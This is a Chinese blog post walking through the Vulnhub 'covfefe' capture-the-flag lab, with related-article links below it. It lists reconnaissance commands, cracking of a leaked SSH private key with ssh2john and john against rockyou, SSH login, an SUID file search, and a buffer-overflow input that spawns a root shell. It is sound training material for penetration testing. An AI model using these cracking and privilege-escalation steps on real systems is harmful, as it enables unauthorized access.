covfefe靶场练习

最新推荐文章于 2024-10-03 23:14:19 发布
最新推荐文章于 2024-10-03 23:14:19 发布
阅读量420 收藏 2
点赞数
文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/sinat_33211329/article/details/117092394
版权
本文介绍了在covfefe靶场中进行网络扫描和开放服务探测的过程。使用netdiscover和nmap扫描IP,通过dirb寻找隐藏页面,利用ssh2john转换密钥并用john解密,最终通过SSH登录并获取权限,揭示了渗透测试中的关键步骤和技术。
摘要由CSDN通过智能技术生成

 

对于covfefe靶场,在安装的时候一定要注意网络设置,不然netdiscover可能会扫描不到!!

  • 挖掘开放服务信息    对于只是给定一个对应ip地址的靶场机器,我们需要对其进行扫描,探测开放的服务,渗透其实是针对服务的漏洞探测,然后进行对应的数据包发送,获取机器的最高权限
    • 探测靶场
      • sudo su -
      • netdiscover -r 192.168.1.1/24
    • nmap -sV 192.168.1.102

 

  • 探测大端口的信息,对于开放http服务的大端口,可采取http://ip:port/ 的形式访问
    查看源代码获取对应的信息,如果没有flag信息,使用工具探测隐藏页面
    • 对这个服务的隐藏文件进行探测 dirb http://ip:port/
    • 使用ssh2john 将id_rsa密钥信息转换为john可以识别的信息
      • 找到ssh2john  locate ssh2john
      • ssh2john id_rsa > rsacrack
        • python /usr/share/john/ssh2john.py  id_rsa > rsacrack
      • 利用字典解密isacrack信息
        • zcat /usr/share/wordlists/rockyou.txt.gz|john --pipe --rules rsacrack
          • 找到密码 starwars
    • 分离用户名、利用ssh登录服务器
      • ssh -i id_rsa 用户名@ssh 靶场机器IP地址
        • ssh -i id_rsa simon@192.168.1.102
          • 密码 starwars
      • 查看路径 pwd
      • 查看文件 ls
      • cd /root
      • ls
      • cat flag.txt  被拒绝,需要提升权限
      • 查看具有root权限的文件  find / -perm -4000 2>/dev/null
      • 运行c文件 read_message
        • cat read_message.c
          • 看到里面有flag提示
        •  read_message
        • 通过溢出代码访问到加权文件超过20个字符,进入root权限
          • 输入  Simon123456789012345/bin/sh
          • 查看角色信息权限    whoami
        • cat flag.txt

 

 

 

-------------------------------------------------------------------------------------------

孙维恪
关注
vulnhub靶场covfefe
kukudeshuo的博客
08-17 560
vulnhub靶场covfefe 环境准备 靶机下载地址:https://www.vulnhub.com/entry/covfefe-1,199/ 攻击机:kali(192.168.109.128) 靶机:covfefe(192.168.109.161) 下载好靶机之后直接使用VMware Workstation Pro虚拟机导入环境,启动即可,将网段设置为NAT模式 信息收集 使用arp-scan确定目标靶机 确定目标靶机IP为192.168.109.161 使用nmap扫描查看目标靶机端口开放情况
靶场笔记-covfefe
qq_51951386的博客
10-16 380
下载靶场 靶场下载地址 通过描述可以看出有3个flag 开启靶场和kali 将靶场和kali的网卡都设置为vm8 扫描 使用ifconfig查看本机ip 再用nmap查询本网段有几个IP地址,发现靶场ip 全面扫描靶场ip 发现开放了3个端口,有2是http 80端口 31337端口 虽然显示not found,但可以看出是开放的 使用nikto扫描80端口,没什么有用的信息 扫描31337端口,发现了一些信息 用dirb扫描31337端口 分别查看上面的网址 .bash_history写
靶机渗透测试(covfefe
小小猪的博客
06-05 923
靶机渗透测试(covfefe) Vulnhub靶机 covfefe 靶机:修改靶机的网络配置为桥接模式。 攻击机:Kali虚拟机,同样使用桥接模式,即可访问靶机。 靶机难度:(Intermediate) 目标:Covfefe is my Debian 9 based B2R VM, originally created as a CTF for SecTalks_BNE. It has three flags… flag进度:3/3 渗透流程: 1. 探测靶机ip地址 arp-scan -l .
靶场渗透——cofefe靶场
l1692423065的博客
03-10 813
也发现了靶场有三个端口是开放的,分别是22,80,31337端口。首先确定kali的IP地址,由于两个靶场都是在NAT模式下,它们处于同一网段。id_rsa就像是私钥钥,id_rsa.pub就像是公钥,并且还都出现了simon这个类似账号的名字。我们发现robots.txt中存在一个新的目录 /taxes,还发现.ssh中有三个不一样的东西。从read_message中,我们能够得到一些信息,分析出来发现这里有着溢出提权的漏洞。我们可以看到,我们已经成功的拿到第一个旗,但是这个好像没有什么用。
靶场covfefe CTF之内网渗透(一)
派大李的博客
11-19 1890
靶场环境和系统:Linux内网 靶机IP:192.168.8.103 kali-ip :192.168.0.102 一、信息收集: 1、主机发现: netdiscover - r 192.168.0.0/24 //获取同网段信息 2、端口扫描: nmap -sV -T4 192.168.0.103 //获取主机端口信息 nmap -T4 -A -v 192.168.0.103 //获取主机详细信息 3、目录扫描: dirb http://192.168.0.103:31337 //获取网站
sqli-labs靶场练习笔记
11-09
### SQLi-Labs靶场练习笔记知识点概览 #### 一、SQL注入基本概念与原理 - **定义**:SQL注入是一种常见的应用层攻击方式,它利用编程中的漏洞,通过在应用程序的输入框中插入恶意SQL语句来控制后端数据库服务器。 -...
phpmyadmin靶场练习
09-13
phpmyadmin靶场
sqli-labs靶场练习wp的配图.zip
01-16
靶场,是指为信息安全人员提供实战演练、渗透测试和攻防对抗等训练环境的虚拟或实体场地。在不同的领域中,靶场扮演着重要的角色,尤其是在网络安全领域,靶场成为培养和提高安全专业人员技能的重要平台。 首先,...
修仙秘境-Web安全靶场 练习web安全漏洞的平台.zip
01-16
靶场,是指为信息安全人员提供实战演练、渗透测试和攻防对抗等训练环境的虚拟或实体场地。在不同的领域中,靶场扮演着重要的角色,尤其是在网络安全领域,靶场成为培养和提高安全专业人员技能的重要平台。 首先,...
CTF—ssh私钥泄露
afei001
09-24 519
练习环境 攻击机:kali 靶机:covfefe(Linux) 攻击机和靶机需要在同一局域网中 目标:获取靶场机器上的flag值 1. 获取靶机IP,测试连通性 root@afei:~# ifconfig eth1 eth1: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500 inet 192.168.3.150 ...
Netdiscover基本使用
热门推荐
weixin_45329009的博客
08-31 1万+
Netdiscover:二层发现工具,拥有主动和被动发现两种方式。 基本用法: 在不知道它的用法之前首先查看它的帮助: 最简单的就是直接输入netdiscover之后就是运行它的默认配置然后扫描局域网中所有的机器这个会非常慢。 1.指定IP段:比如10.10.10.0 选择你监听的网卡:比如eth0 -p 被动模式。默默的侦听指定的网卡以发现别的二层主机 -t ARP包发送间隔。单位毫秒...
Vulnhub靶机检测不到IP地址
asstart的博客
12-07 6488
vulnhub靶机无法获取IP地址 0x00前言 小编从vulnhub官网下载靶机,准备做学习测试时,使用kali无法检测到靶机的IP,arp-scan、nmap存活主机探测、netdiscover均未检测到靶机的IP地址,因为我们无法获取靶机的IP地址的话就没办法进行下一步。 0x01排查 确保kali与vulnhub靶机同处在一个网络环境。经过确认kali虚拟机和vulnhub靶机均同处在VM...
使用netdiscover进行主动(被动)扫描
qq_44657899的博客
07-10 1854
主动扫描 主动模式顾名思义就是主动的探测发现网络内主机,但是这种方式往往会引起网络管理员的注意。 命令如下: netdiscover -i eth0 -r 192.168.8.0/24 -i:网卡 -r:网段 被动扫描 被动模式的方法更加隐蔽,但是速度会比较慢,网卡被设置为混杂模式来侦听网络内的arp数据包进行被动式探测,这种方式就需要网络内设备发送arp包才能被探测到。。 命令如下: netdiscover -p -p:被动扫描模式 但是这种方式非常慢。 因为局域网内主机少,所以等了半天没出来
使用netdiscover进行网络发现
weixin_33788244的博客
05-29 1400
概述 脚本小子的日常就是只能介绍一些工具了,今天介绍一个比较简单的工具就是netdiscover了,这个工具最主要就是用来网络发现的 安装 我的环境是在kali下面的,ubuntu的软件源里面也有,所以安装很简单,用包管理器安装就好了apt install netdiscover 使用 因为工具比较简单所以使用也是比较简单的没有什么复杂的参数s首先看一...
关于Vulnhub 靶机ip无法扫描到的解决方法
weixin_63231007的博客
07-12 1614
Vulnhub一些靶机是对应 Virtual Box 的。使用Vmware的话有时候会出现扫描不到靶机ip的情况。在靶机描述里有:VirtualBox 是应对这一挑战的推荐平台。解决方法呢就是。1. 首先重启靶机,在重启界面点击键盘e,找到内核加载配置行,将其修改为单用户启动模式: 2. 将 ro 改为 rw single init=/bin/bash3. Ctrl+x进入单用户模式(root),输入 ip a 命令查看网卡设备名称:是ens334. 查看网络配置文件/etc/network/interf
网络安全 网络安全的主要领域 安全威胁 防护技术 安全策略 未来趋势
最新发布
weixin_42462436的博客
10-03 1412
随着智能手机和平板电脑的广泛使用,移动设备的安全(如数据加密、设备丢失保护等)也成为重点。由国家级或高级黑客组织发起的持续性、高度隐蔽的网络攻击,通常以窃取敏感信息为目的。使用加密、访问控制、数据备份等手段来保护信息免受未经授权的访问、修改或删除。包括防火墙、入侵检测系统(IDS)、入侵防御系统(IPS)等技术的使用。保证操作系统和相关服务的安全,包括权限控制、补丁管理、系统日志监控等。利用全球收集的安全信息和分析工具,提前识别并防御潜在的威胁。关注对虚拟化平台、API安全、数据隔离和访问管理的控制。
前置机、跳板机、堡垒机:安全运维领域的“黄金三角”
拉格朗日的学习笔记
09-28 984
为了确保数据的安全性、提升系统的可靠性和性能,企业需要采用一系列先进的设备和系统来构建坚固的IT防御体系。其中,前置机、跳板机和堡垒机作为关键组件,各自在网络安全和运维管理中发挥着不可替代的作用。
vulhub靶场练习
07-28
- *1* [vulhub靶场练习——Apache换行解析、多后缀解析、以及ssl远程命令执行漏洞分析](https://blog.csdn.net/qq_38632151/article/details/103287260)[target="_blank" data-report-click={"spm":"1018.2226.3001....
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值